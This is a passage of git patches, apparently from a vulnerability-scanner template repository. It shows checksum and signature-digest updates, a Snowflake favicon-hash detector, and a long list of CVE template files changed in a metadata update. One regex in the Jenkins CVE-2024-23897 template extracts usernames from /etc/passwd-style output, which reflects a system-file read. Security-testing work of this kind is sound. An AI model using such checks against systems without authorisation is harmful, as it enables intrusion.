http/vulnerabilities/generic/generic-windows-lfi.yaml:ddcb321d2bb5e3e9bee57a6593 http/vulnerabilities/generic/host-header-injection.yaml:827f0694d3294d945da80d2dd7aa2ed3e820fc68 http/vulnerabilities/generic/oob-header-based-interaction.yaml:2cac39750dee5c610c6c1023a6fa0c73199e66ec http/vulnerabilities/generic/oob-param-based-interaction.yaml:635728a0bd7fbecc745a2be8d7a51b02ed0ee57b -http/vulnerabilities/generic/open-redirect-generic.yaml:b9579f44cf441d40efd816759d26ef4b85cfe8c2 +http/vulnerabilities/generic/open-redirect-generic.yaml:d846ac7b28a783ecb5a42d54cf3e5c9c9112a15f http/vulnerabilities/generic/request-based-interaction.yaml:d3d7eaea6c38c5463861075a7542ed9c7e8f119e http/vulnerabilities/generic/top-xss-params.yaml:3e9a7e3fa96022f53af19ddd617225731c3bd9df http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml:0a058b056b1584bc9de28df14baa9b57be220e88 @@ -8384,7 +8384,7 @@ javascript/cves/2020/CVE-2020-7247.yaml:60f4be8c576cc07ffa7b843ff99a5678b096df0b javascript/cves/2023/CVE-2023-34039.yaml:af0340b7a937d8e4583b64c5e500566328c6ae51 javascript/cves/2023/CVE-2023-46604.yaml:ded5a8bcb92125c053b218e259931104983bd625 javascript/cves/2023/CVE-2023-48795.yaml:cb420dbeb5e653c4a7c056fa2c95d53dd347d29b -javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 +javascript/cves/2024/CVE-2024-23897.yaml:fcd41e7a0767d210fc075e34cd1775b4f2a39625 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f @@ -8612,7 +8612,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e9b7ab6b37d090554480984f389267ae1c7150ac +templates-checksum.txt:aaafa43ba87bc0f6c826b47c6238ecbfea75be99 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3777ab675546176caab2ec7e25a7ff33a108dd68 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 18:30:28 +0000 Subject: [PATCH 544/847] Auto Template Signing [Fri May 31 18:30:28 UTC 2024] :robot: --- javascript/cves/2024/CVE-2024-23897.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/cves/2024/CVE-2024-23897.yaml b/javascript/cves/2024/CVE-2024-23897.yaml index 8c59f424b6..ef4476d1a7 100644 --- a/javascript/cves/2024/CVE-2024-23897.yaml +++ b/javascript/cves/2024/CVE-2024-23897.yaml @@ -54,4 +54,4 @@ javascript: group: 1 regex: - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009620f183855d6c7a8df52675559cce3e55d4a086a6423f9f10ebbfe5a199cc250220154b8ff85e7a379aca2c40226244732b393aebba8e6a965d1b15d200f645245a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e09b9abae3c3d0e5dae4b28549dd092b9a69ac6c Mon Sep 17 00:00:00 2001 From: Rishi Date: Fri, 31 May 2024 19:48:35 +0100 Subject: [PATCH 545/847] snowflake favicon hash --- http/technologies/favicon-detect.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 97d338b8eb..813739a59c 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3751,6 +3751,11 @@ http: dsl: - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" + - type: dsl + name: "snowflake" + dsl: + - "status_code==200 && (\"307296554\" == mmh3(base64_py(body)))" + extractors: - type: dsl dsl: From 2fc42cb2a49eb8f82c95127c76b73814f0e101a7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 31 May 2024 23:23:20 +0400 Subject: [PATCH 546/847] product/queries updated --- http/cves/2000/CVE-2000-0114.yaml | 3 ++- http/cves/2001/CVE-2001-0537.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 3 +++ http/cves/2004/CVE-2004-1965.yaml | 3 ++- http/cves/2005/CVE-2005-3344.yaml | 4 ++-- http/cves/2005/CVE-2005-3634.yaml | 3 ++- http/cves/2006/CVE-2006-2842.yaml | 7 ++++-- http/cves/2007/CVE-2007-0885.yaml | 2 +- http/cves/2007/CVE-2007-3010.yaml | 5 ++-- http/cves/2007/CVE-2007-4504.yaml | 4 ++-- http/cves/2007/CVE-2007-4556.yaml | 4 ++-- http/cves/2007/CVE-2007-5728.yaml | 2 ++ http/cves/2008/CVE-2008-1061.yaml | 3 +-- http/cves/2008/CVE-2008-1547.yaml | 2 ++ http/cves/2008/CVE-2008-2650.yaml | 1 + http/cves/2008/CVE-2008-4764.yaml | 4 ++-- http/cves/2008/CVE-2008-5587.yaml | 4 +++- http/cves/2008/CVE-2008-6080.yaml | 2 +- http/cves/2008/CVE-2008-6172.yaml | 2 +- http/cves/2008/CVE-2008-6222.yaml | 5 ++-- http/cves/2008/CVE-2008-6465.yaml | 2 ++ http/cves/2008/CVE-2008-6668.yaml | 2 +- http/cves/2008/CVE-2008-7269.yaml | 5 ++-- http/cves/2009/CVE-2009-0545.yaml | 5 +++- http/cves/2009/CVE-2009-0932.yaml | 2 +- http/cves/2009/CVE-2009-1151.yaml | 8 +++++-- http/cves/2009/CVE-2009-1872.yaml | 2 ++ http/cves/2009/CVE-2009-2100.yaml | 4 ++-- http/cves/2009/CVE-2009-3318.yaml | 4 ++-- http/cves/2009/CVE-2009-4202.yaml | 7 ++++-- http/cves/2009/CVE-2009-4223.yaml | 2 +- http/cves/2009/CVE-2009-5020.yaml | 6 +++-- http/cves/2010/CVE-2010-0157.yaml | 6 +++-- http/cves/2010/CVE-2010-0219.yaml | 3 ++- http/cves/2010/CVE-2010-0467.yaml | 2 +- http/cves/2010/CVE-2010-0759.yaml | 2 +- http/cves/2010/CVE-2010-0942.yaml | 2 +- http/cves/2010/CVE-2010-0972.yaml | 2 +- http/cves/2010/CVE-2010-1081.yaml | 5 ++-- http/cves/2010/CVE-2010-1305.yaml | 2 +- http/cves/2010/CVE-2010-1306.yaml | 2 +- http/cves/2010/CVE-2010-1307.yaml | 3 ++- http/cves/2010/CVE-2010-1308.yaml | 2 +- http/cves/2010/CVE-2010-1312.yaml | 2 +- http/cves/2010/CVE-2010-1313.yaml | 3 ++- http/cves/2010/CVE-2010-1353.yaml | 2 +- http/cves/2010/CVE-2010-1354.yaml | 2 +- http/cves/2010/CVE-2010-1429.yaml | 2 ++ http/cves/2010/CVE-2010-1461.yaml | 3 ++- http/cves/2010/CVE-2010-1469.yaml | 2 +- http/cves/2010/CVE-2010-1471.yaml | 2 +- http/cves/2010/CVE-2010-1473.yaml | 2 +- http/cves/2010/CVE-2010-1474.yaml | 3 ++- http/cves/2010/CVE-2010-1476.yaml | 2 +- http/cves/2010/CVE-2010-1494.yaml | 2 +- http/cves/2010/CVE-2010-1532.yaml | 2 +- http/cves/2010/CVE-2010-1533.yaml | 2 +- http/cves/2010/CVE-2010-1534.yaml | 2 +- http/cves/2010/CVE-2010-1535.yaml | 3 ++- http/cves/2010/CVE-2010-1602.yaml | 2 +- http/cves/2010/CVE-2010-1607.yaml | 2 +- http/cves/2010/CVE-2010-1653.yaml | 2 +- http/cves/2010/CVE-2010-1657.yaml | 2 +- http/cves/2010/CVE-2010-1659.yaml | 2 +- http/cves/2010/CVE-2010-1715.yaml | 3 ++- http/cves/2010/CVE-2010-1718.yaml | 2 +- http/cves/2010/CVE-2010-1723.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 3 +++ http/cves/2010/CVE-2010-1952.yaml | 2 +- http/cves/2010/CVE-2010-1953.yaml | 2 +- http/cves/2010/CVE-2010-1955.yaml | 3 ++- http/cves/2010/CVE-2010-1956.yaml | 2 +- http/cves/2010/CVE-2010-1957.yaml | 2 +- http/cves/2010/CVE-2010-1977.yaml | 3 ++- http/cves/2010/CVE-2010-1982.yaml | 2 +- http/cves/2010/CVE-2010-2036.yaml | 4 ++-- http/cves/2010/CVE-2010-2037.yaml | 4 ++-- http/cves/2010/CVE-2010-2050.yaml | 2 +- http/cves/2010/CVE-2010-2507.yaml | 2 +- http/cves/2010/CVE-2010-2680.yaml | 3 ++- http/cves/2010/CVE-2010-2861.yaml | 4 +++- http/cves/2010/CVE-2010-2918.yaml | 2 +- http/cves/2010/CVE-2010-3203.yaml | 4 ++-- http/cves/2010/CVE-2010-4231.yaml | 2 +- http/cves/2010/CVE-2010-4239.yaml | 6 +++-- http/cves/2010/CVE-2010-4282.yaml | 3 +++ http/cves/2010/CVE-2010-4977.yaml | 2 +- http/cves/2010/CVE-2010-5028.yaml | 2 +- http/cves/2010/CVE-2010-5278.yaml | 5 ++-- http/cves/2010/CVE-2010-5286.yaml | 4 ++-- http/cves/2011/CVE-2011-0049.yaml | 4 ++-- http/cves/2011/CVE-2011-2744.yaml | 2 +- http/cves/2011/CVE-2011-2780.yaml | 2 +- http/cves/2011/CVE-2011-4336.yaml | 2 ++ http/cves/2011/CVE-2011-4640.yaml | 7 ++++-- http/cves/2011/CVE-2011-4804.yaml | 4 ++-- http/cves/2011/CVE-2011-4926.yaml | 3 +-- http/cves/2011/CVE-2011-5106.yaml | 2 +- http/cves/2011/CVE-2011-5181.yaml | 5 ++-- http/cves/2011/CVE-2011-5265.yaml | 3 +-- http/cves/2012/CVE-2012-0392.yaml | 7 ++++-- http/cves/2012/CVE-2012-0394.yaml | 2 ++ http/cves/2012/CVE-2012-0896.yaml | 4 ++-- http/cves/2012/CVE-2012-0901.yaml | 6 ++--- http/cves/2012/CVE-2012-0981.yaml | 5 ++-- http/cves/2012/CVE-2012-0991.yaml | 7 ++++-- http/cves/2012/CVE-2012-0996.yaml | 4 ++-- http/cves/2012/CVE-2012-1226.yaml | 6 +++-- http/cves/2012/CVE-2012-1823.yaml | 6 ++--- http/cves/2012/CVE-2012-1835.yaml | 5 ++-- http/cves/2012/CVE-2012-2371.yaml | 5 ++-- http/cves/2012/CVE-2012-3153.yaml | 5 +++- http/cves/2012/CVE-2012-4242.yaml | 5 ++-- http/cves/2012/CVE-2012-4273.yaml | 3 +-- http/cves/2012/CVE-2012-4547.yaml | 1 + http/cves/2012/CVE-2012-4768.yaml | 3 ++- http/cves/2012/CVE-2012-4878.yaml | 4 ++-- http/cves/2012/CVE-2012-4889.yaml | 2 +- http/cves/2012/CVE-2012-4982.yaml | 2 +- http/cves/2012/CVE-2012-5321.yaml | 5 ++-- http/cves/2012/CVE-2012-5913.yaml | 3 +-- http/cves/2012/CVE-2012-6499.yaml | 4 ++-- http/cves/2013/CVE-2013-1965.yaml | 3 +++ http/cves/2013/CVE-2013-2248.yaml | 7 ++++-- http/cves/2013/CVE-2013-2251.yaml | 3 +++ http/cves/2013/CVE-2013-2287.yaml | 5 ++-- http/cves/2013/CVE-2013-3526.yaml | 4 ++-- http/cves/2013/CVE-2013-3827.yaml | 3 +++ http/cves/2013/CVE-2013-4117.yaml | 3 +-- http/cves/2013/CVE-2013-4625.yaml | 3 +-- http/cves/2013/CVE-2013-5979.yaml | 4 ++-- http/cves/2013/CVE-2013-6281.yaml | 4 ++-- http/cves/2013/CVE-2013-7091.yaml | 3 +++ http/cves/2013/CVE-2013-7240.yaml | 4 ++-- http/cves/2014/CVE-2014-1203.yaml | 2 +- http/cves/2014/CVE-2014-2321.yaml | 5 ++-- http/cves/2014/CVE-2014-2323.yaml | 3 ++- http/cves/2014/CVE-2014-2383.yaml | 4 ++-- http/cves/2014/CVE-2014-2908.yaml | 4 ++-- http/cves/2014/CVE-2014-2962.yaml | 4 ++-- http/cves/2014/CVE-2014-3120.yaml | 3 ++- http/cves/2014/CVE-2014-3744.yaml | 3 ++- http/cves/2014/CVE-2014-4210.yaml | 6 +++-- http/cves/2014/CVE-2014-4536.yaml | 4 ++-- http/cves/2014/CVE-2014-4539.yaml | 3 +-- http/cves/2014/CVE-2014-4558.yaml | 4 ++-- http/cves/2014/CVE-2014-4561.yaml | 3 +-- http/cves/2014/CVE-2014-4940.yaml | 4 ++-- http/cves/2014/CVE-2014-5258.yaml | 1 + http/cves/2014/CVE-2014-6271.yaml | 2 +- http/cves/2014/CVE-2014-6287.yaml | 5 ++-- http/cves/2014/CVE-2014-8676.yaml | 2 ++ http/cves/2014/CVE-2014-8682.yaml | 2 ++ http/cves/2014/CVE-2014-8799.yaml | 2 +- http/cves/2014/CVE-2014-9180.yaml | 5 ++-- http/cves/2014/CVE-2014-9444.yaml | 5 ++-- http/cves/2014/CVE-2014-9606.yaml | 3 ++- http/cves/2014/CVE-2014-9607.yaml | 2 +- http/cves/2014/CVE-2014-9608.yaml | 2 +- http/cves/2014/CVE-2014-9614.yaml | 2 +- http/cves/2014/CVE-2014-9617.yaml | 2 +- http/cves/2014/CVE-2014-9618.yaml | 3 ++- http/cves/2015/CVE-2015-1000005.yaml | 4 ++-- http/cves/2015/CVE-2015-1427.yaml | 5 ++-- http/cves/2015/CVE-2015-1503.yaml | 2 ++ http/cves/2015/CVE-2015-1579.yaml | 4 ++-- http/cves/2015/CVE-2015-1635.yaml | 4 ++-- http/cves/2015/CVE-2015-1880.yaml | 2 ++ http/cves/2015/CVE-2015-2068.yaml | 2 +- http/cves/2015/CVE-2015-2080.yaml | 5 ++-- http/cves/2015/CVE-2015-2166.yaml | 4 ++-- http/cves/2015/CVE-2015-2196.yaml | 4 ++-- http/cves/2015/CVE-2015-2755.yaml | 4 ++-- http/cves/2015/CVE-2015-2807.yaml | 3 +-- http/cves/2015/CVE-2015-2996.yaml | 1 + http/cves/2015/CVE-2015-3035.yaml | 4 +++- http/cves/2015/CVE-2015-3224.yaml | 2 +- http/cves/2015/CVE-2015-3337.yaml | 5 ++-- http/cves/2015/CVE-2015-4050.yaml | 3 ++- http/cves/2015/CVE-2015-4062.yaml | 4 ++-- http/cves/2015/CVE-2015-4074.yaml | 2 +- http/cves/2015/CVE-2015-4127.yaml | 4 ++-- http/cves/2015/CVE-2015-4455.yaml | 5 ++-- http/cves/2015/CVE-2015-4632.yaml | 1 + http/cves/2015/CVE-2015-4666.yaml | 2 +- http/cves/2015/CVE-2015-4668.yaml | 2 +- http/cves/2015/CVE-2015-4694.yaml | 2 +- http/cves/2015/CVE-2015-5461.yaml | 2 +- http/cves/2015/CVE-2015-5471.yaml | 4 ++-- http/cves/2015/CVE-2015-5531.yaml | 3 ++- http/cves/2015/CVE-2015-5688.yaml | 2 +- http/cves/2015/CVE-2015-7245.yaml | 4 ++-- http/cves/2015/CVE-2015-7297.yaml | 2 ++ http/cves/2015/CVE-2015-7377.yaml | 2 +- http/cves/2015/CVE-2015-7450.yaml | 3 ++- http/cves/2015/CVE-2015-7780.yaml | 3 +++ http/cves/2015/CVE-2015-7823.yaml | 3 +++ http/cves/2015/CVE-2015-8813.yaml | 2 +- http/cves/2015/CVE-2015-9312.yaml | 2 +- http/cves/2015/CVE-2015-9323.yaml | 4 ++-- http/cves/2015/CVE-2015-9480.yaml | 4 ++-- http/cves/2016/CVE-2016-0957.yaml | 2 +- http/cves/2016/CVE-2016-1000126.yaml | 3 +-- http/cves/2016/CVE-2016-1000127.yaml | 3 +-- http/cves/2016/CVE-2016-1000131.yaml | 5 ++-- http/cves/2016/CVE-2016-1000133.yaml | 3 +-- http/cves/2016/CVE-2016-1000137.yaml | 5 ++-- http/cves/2016/CVE-2016-1000138.yaml | 4 ++-- http/cves/2016/CVE-2016-1000141.yaml | 3 +-- http/cves/2016/CVE-2016-1000142.yaml | 3 +-- http/cves/2016/CVE-2016-1000148.yaml | 3 +-- http/cves/2016/CVE-2016-1000149.yaml | 3 +-- http/cves/2016/CVE-2016-1000154.yaml | 3 +-- http/cves/2016/CVE-2016-1000155.yaml | 3 +-- http/cves/2016/CVE-2016-10033.yaml | 2 +- http/cves/2016/CVE-2016-10108.yaml | 1 + http/cves/2016/CVE-2016-10134.yaml | 3 +++ http/cves/2016/CVE-2016-10367.yaml | 2 ++ http/cves/2016/CVE-2016-10368.yaml | 3 +++ http/cves/2016/CVE-2016-10924.yaml | 5 ++-- http/cves/2016/CVE-2016-10956.yaml | 5 ++-- http/cves/2016/CVE-2016-10973.yaml | 2 +- http/cves/2016/CVE-2016-10993.yaml | 3 +-- http/cves/2016/CVE-2016-1555.yaml | 2 +- http/cves/2016/CVE-2016-2389.yaml | 1 + http/cves/2016/CVE-2016-3081.yaml | 3 +++ http/cves/2016/CVE-2016-3088.yaml | 1 + http/cves/2016/CVE-2016-3978.yaml | 2 ++ http/cves/2016/CVE-2016-4975.yaml | 3 ++- http/cves/2016/CVE-2016-5674.yaml | 5 ++-- http/cves/2016/CVE-2016-6195.yaml | 4 +++- http/cves/2016/CVE-2016-7552.yaml | 2 +- http/cves/2016/CVE-2016-7981.yaml | 4 +++- http/cves/2016/CVE-2016-8527.yaml | 5 ++-- http/cves/2017/CVE-2017-0929.yaml | 1 + http/cves/2017/CVE-2017-1000028.yaml | 3 ++- http/cves/2017/CVE-2017-1000029.yaml | 1 + http/cves/2017/CVE-2017-10075.yaml | 3 ++- http/cves/2017/CVE-2017-10271.yaml | 3 +++ http/cves/2017/CVE-2017-11165.yaml | 2 ++ http/cves/2017/CVE-2017-11444.yaml | 5 ++-- http/cves/2017/CVE-2017-11512.yaml | 2 ++ http/cves/2017/CVE-2017-11610.yaml | 6 +++-- http/cves/2017/CVE-2017-12138.yaml | 2 +- http/cves/2017/CVE-2017-12149.yaml | 5 +++- http/cves/2017/CVE-2017-12544.yaml | 2 +- http/cves/2017/CVE-2017-12583.yaml | 6 +++-- http/cves/2017/CVE-2017-12611.yaml | 3 +++ http/cves/2017/CVE-2017-12615.yaml | 2 ++ http/cves/2017/CVE-2017-12617.yaml | 2 ++ http/cves/2017/CVE-2017-12629.yaml | 3 +++ http/cves/2017/CVE-2017-12635.yaml | 1 + http/cves/2017/CVE-2017-12637.yaml | 1 + http/cves/2017/CVE-2017-12794.yaml | 3 ++- http/cves/2017/CVE-2017-14135.yaml | 4 +++- http/cves/2017/CVE-2017-14186.yaml | 3 ++- http/cves/2017/CVE-2017-14524.yaml | 2 +- http/cves/2017/CVE-2017-14535.yaml | 2 +- http/cves/2017/CVE-2017-14622.yaml | 2 +- http/cves/2017/CVE-2017-14651.yaml | 5 +++- http/cves/2017/CVE-2017-14849.yaml | 5 +++- http/cves/2017/CVE-2017-15715.yaml | 1 + http/cves/2017/CVE-2017-15944.yaml | 2 ++ http/cves/2017/CVE-2017-16806.yaml | 2 +- http/cves/2017/CVE-2017-16877.yaml | 2 ++ http/cves/2017/CVE-2017-17043.yaml | 3 +-- http/cves/2017/CVE-2017-17059.yaml | 6 ++--- http/cves/2017/CVE-2017-17451.yaml | 3 +-- http/cves/2017/CVE-2017-17562.yaml | 1 + http/cves/2017/CVE-2017-17736.yaml | 2 ++ http/cves/2017/CVE-2017-18024.yaml | 5 +++- http/cves/2017/CVE-2017-18487.yaml | 2 ++ http/cves/2017/CVE-2017-18490.yaml | 2 ++ http/cves/2017/CVE-2017-18491.yaml | 4 +++- http/cves/2017/CVE-2017-18492.yaml | 2 ++ http/cves/2017/CVE-2017-18493.yaml | 2 ++ http/cves/2017/CVE-2017-18494.yaml | 4 +++- http/cves/2017/CVE-2017-18496.yaml | 2 ++ http/cves/2017/CVE-2017-18500.yaml | 4 +++- http/cves/2017/CVE-2017-18501.yaml | 4 +++- http/cves/2017/CVE-2017-18502.yaml | 4 +++- http/cves/2017/CVE-2017-18505.yaml | 2 ++ http/cves/2017/CVE-2017-18516.yaml | 4 +++- http/cves/2017/CVE-2017-18517.yaml | 4 +++- http/cves/2017/CVE-2017-18518.yaml | 4 +++- http/cves/2017/CVE-2017-18527.yaml | 4 +++- http/cves/2017/CVE-2017-18528.yaml | 2 ++ http/cves/2017/CVE-2017-18529.yaml | 4 +++- http/cves/2017/CVE-2017-18530.yaml | 2 ++ http/cves/2017/CVE-2017-18532.yaml | 2 ++ http/cves/2017/CVE-2017-18536.yaml | 2 +- http/cves/2017/CVE-2017-18537.yaml | 4 +++- http/cves/2017/CVE-2017-18542.yaml | 4 +++- http/cves/2017/CVE-2017-18556.yaml | 4 +++- http/cves/2017/CVE-2017-18557.yaml | 4 +++- http/cves/2017/CVE-2017-18558.yaml | 4 +++- http/cves/2017/CVE-2017-18562.yaml | 4 +++- http/cves/2017/CVE-2017-18564.yaml | 4 +++- http/cves/2017/CVE-2017-18565.yaml | 4 +++- http/cves/2017/CVE-2017-18566.yaml | 4 +++- http/cves/2017/CVE-2017-18598.yaml | 3 +-- http/cves/2017/CVE-2017-18638.yaml | 4 ++-- http/cves/2017/CVE-2017-3506.yaml | 3 +++ http/cves/2017/CVE-2017-3528.yaml | 2 +- http/cves/2017/CVE-2017-4011.yaml | 2 +- http/cves/2017/CVE-2017-5631.yaml | 3 ++- http/cves/2017/CVE-2017-5638.yaml | 4 +++- http/cves/2017/CVE-2017-5689.yaml | 2 ++ http/cves/2017/CVE-2017-6090.yaml | 3 ++- http/cves/2017/CVE-2017-7269.yaml | 1 + http/cves/2017/CVE-2017-7391.yaml | 3 ++- http/cves/2017/CVE-2017-7615.yaml | 4 +++- http/cves/2017/CVE-2017-7855.yaml | 2 ++ http/cves/2017/CVE-2017-7921.yaml | 2 +- http/cves/2017/CVE-2017-7925.yaml | 1 + http/cves/2017/CVE-2017-8917.yaml | 3 ++- http/cves/2017/CVE-2017-9140.yaml | 2 +- http/cves/2017/CVE-2017-9416.yaml | 7 ++++-- http/cves/2017/CVE-2017-9506.yaml | 3 ++- http/cves/2017/CVE-2017-9791.yaml | 1 + http/cves/2017/CVE-2017-9805.yaml | 5 +++- http/cves/2017/CVE-2017-9822.yaml | 5 ++-- http/cves/2017/CVE-2017-9833.yaml | 2 +- http/cves/2018/CVE-2018-0127.yaml | 3 ++- http/cves/2018/CVE-2018-1000129.yaml | 2 +- http/cves/2018/CVE-2018-1000130.yaml | 4 +++- http/cves/2018/CVE-2018-1000226.yaml | 3 +++ http/cves/2018/CVE-2018-1000533.yaml | 1 + http/cves/2018/CVE-2018-1000671.yaml | 1 + http/cves/2018/CVE-2018-1000856.yaml | 4 ++-- http/cves/2018/CVE-2018-1000861.yaml | 6 +++-- http/cves/2018/CVE-2018-10141.yaml | 4 +++- http/cves/2018/CVE-2018-10230.yaml | 1 + http/cves/2018/CVE-2018-10562.yaml | 5 ++-- http/cves/2018/CVE-2018-10735.yaml | 3 ++- http/cves/2018/CVE-2018-10736.yaml | 7 +++--- http/cves/2018/CVE-2018-10737.yaml | 3 ++- http/cves/2018/CVE-2018-10738.yaml | 7 +++--- http/cves/2018/CVE-2018-10823.yaml | 4 ++-- http/cves/2018/CVE-2018-10942.yaml | 10 +++++++- http/cves/2018/CVE-2018-10956.yaml | 6 +++-- http/cves/2018/CVE-2018-11227.yaml | 1 + http/cves/2018/CVE-2018-11409.yaml | 3 +++ http/cves/2018/CVE-2018-11473.yaml | 5 ++-- http/cves/2018/CVE-2018-11709.yaml | 4 ++-- http/cves/2018/CVE-2018-11759.yaml | 2 ++ http/cves/2018/CVE-2018-11776.yaml | 5 +++- http/cves/2018/CVE-2018-11784.yaml | 6 +++-- http/cves/2018/CVE-2018-12031.yaml | 4 ++-- http/cves/2018/CVE-2018-12296.yaml | 3 +++ http/cves/2018/CVE-2018-12300.yaml | 3 +++ http/cves/2018/CVE-2018-12613.yaml | 8 +++++-- http/cves/2018/CVE-2018-12634.yaml | 4 ++-- http/cves/2018/CVE-2018-12675.yaml | 2 +- http/cves/2018/CVE-2018-1271.yaml | 2 +- http/cves/2018/CVE-2018-1335.yaml | 4 ++-- http/cves/2018/CVE-2018-13379.yaml | 1 + http/cves/2018/CVE-2018-13380.yaml | 4 +++- http/cves/2018/CVE-2018-13980.yaml | 2 +- http/cves/2018/CVE-2018-14013.yaml | 7 ++++-- http/cves/2018/CVE-2018-14474.yaml | 5 ++-- http/cves/2018/CVE-2018-14574.yaml | 5 ++-- http/cves/2018/CVE-2018-14912.yaml | 3 +++ http/cves/2018/CVE-2018-14916.yaml | 8 +++---- http/cves/2018/CVE-2018-14918.yaml | 5 ++-- http/cves/2018/CVE-2018-14931.yaml | 2 +- http/cves/2018/CVE-2018-15517.yaml | 2 +- http/cves/2018/CVE-2018-15535.yaml | 5 ++-- http/cves/2018/CVE-2018-15745.yaml | 7 ++++-- http/cves/2018/CVE-2018-15917.yaml | 5 ++-- http/cves/2018/CVE-2018-15961.yaml | 6 +++-- http/cves/2018/CVE-2018-16139.yaml | 4 +++- http/cves/2018/CVE-2018-16159.yaml | 2 ++ http/cves/2018/CVE-2018-16167.yaml | 2 +- http/cves/2018/CVE-2018-16283.yaml | 4 ++-- http/cves/2018/CVE-2018-16288.yaml | 2 +- http/cves/2018/CVE-2018-16716.yaml | 4 ++-- http/cves/2018/CVE-2018-16761.yaml | 7 ++++-- http/cves/2018/CVE-2018-16763.yaml | 7 ++++-- http/cves/2018/CVE-2018-16836.yaml | 2 +- http/cves/2018/CVE-2018-16979.yaml | 2 ++ http/cves/2018/CVE-2018-17153.yaml | 5 ++-- http/cves/2018/CVE-2018-17246.yaml | 3 +++ http/cves/2018/CVE-2018-17254.yaml | 7 ++++-- http/cves/2018/CVE-2018-17422.yaml | 4 +++- http/cves/2018/CVE-2018-18264.yaml | 4 ++-- http/cves/2018/CVE-2018-18323.yaml | 7 ++++-- http/cves/2018/CVE-2018-18570.yaml | 2 +- http/cves/2018/CVE-2018-18608.yaml | 1 + http/cves/2018/CVE-2018-18777.yaml | 6 +++-- http/cves/2018/CVE-2018-18778.yaml | 4 ++-- http/cves/2018/CVE-2018-18809.yaml | 5 ++-- http/cves/2018/CVE-2018-18925.yaml | 5 +++- http/cves/2018/CVE-2018-19137.yaml | 4 ++-- http/cves/2018/CVE-2018-19287.yaml | 7 ++++-- http/cves/2018/CVE-2018-19326.yaml | 5 ++-- http/cves/2018/CVE-2018-19365.yaml | 3 +++ http/cves/2018/CVE-2018-19386.yaml | 2 +- http/cves/2018/CVE-2018-19439.yaml | 4 ++-- http/cves/2018/CVE-2018-19458.yaml | 4 ++-- http/cves/2018/CVE-2018-19749.yaml | 4 ++-- http/cves/2018/CVE-2018-19752.yaml | 4 ++-- http/cves/2018/CVE-2018-19753.yaml | 5 ++-- http/cves/2018/CVE-2018-19914.yaml | 4 ++-- http/cves/2018/CVE-2018-19915.yaml | 4 ++-- http/cves/2018/CVE-2018-20009.yaml | 6 +++-- http/cves/2018/CVE-2018-20470.yaml | 4 ++-- http/cves/2018/CVE-2018-20526.yaml | 4 +++- http/cves/2018/CVE-2018-20824.yaml | 2 +- http/cves/2018/CVE-2018-20985.yaml | 4 ++-- http/cves/2018/CVE-2018-2791.yaml | 2 +- http/cves/2018/CVE-2018-2894.yaml | 3 +++ http/cves/2018/CVE-2018-3167.yaml | 4 ++-- http/cves/2018/CVE-2018-3238.yaml | 2 +- http/cves/2018/CVE-2018-5230.yaml | 4 ++-- http/cves/2018/CVE-2018-5233.yaml | 3 ++- http/cves/2018/CVE-2018-5715.yaml | 1 + http/cves/2018/CVE-2018-6008.yaml | 4 +++- http/cves/2018/CVE-2018-6184.yaml | 3 ++- http/cves/2018/CVE-2018-6200.yaml | 3 +++ http/cves/2018/CVE-2018-6910.yaml | 2 ++ http/cves/2018/CVE-2018-7251.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 6 +++-- http/cves/2018/CVE-2018-7467.yaml | 3 ++- http/cves/2018/CVE-2018-7600.yaml | 2 +- http/cves/2018/CVE-2018-7602.yaml | 4 ++-- http/cves/2018/CVE-2018-7653.yaml | 3 ++- http/cves/2018/CVE-2018-7662.yaml | 4 ++-- http/cves/2018/CVE-2018-7700.yaml | 2 ++ http/cves/2018/CVE-2018-8006.yaml | 3 ++- http/cves/2018/CVE-2018-8033.yaml | 4 +++- http/cves/2018/CVE-2018-8715.yaml | 1 + http/cves/2018/CVE-2018-8719.yaml | 2 +- http/cves/2018/CVE-2018-8823.yaml | 2 +- http/cves/2018/CVE-2018-9118.yaml | 2 +- http/cves/2018/CVE-2018-9205.yaml | 2 +- http/cves/2019/CVE-2019-0193.yaml | 3 +++ http/cves/2019/CVE-2019-0221.yaml | 6 +++-- http/cves/2019/CVE-2019-0230.yaml | 3 +++ http/cves/2019/CVE-2019-10068.yaml | 1 + http/cves/2019/CVE-2019-10092.yaml | 3 ++- http/cves/2019/CVE-2019-10098.yaml | 1 + http/cves/2019/CVE-2019-1010290.yaml | 2 +- http/cves/2019/CVE-2019-10405.yaml | 1 + http/cves/2019/CVE-2019-10475.yaml | 4 ++-- http/cves/2019/CVE-2019-10692.yaml | 5 ++-- http/cves/2019/CVE-2019-10717.yaml | 5 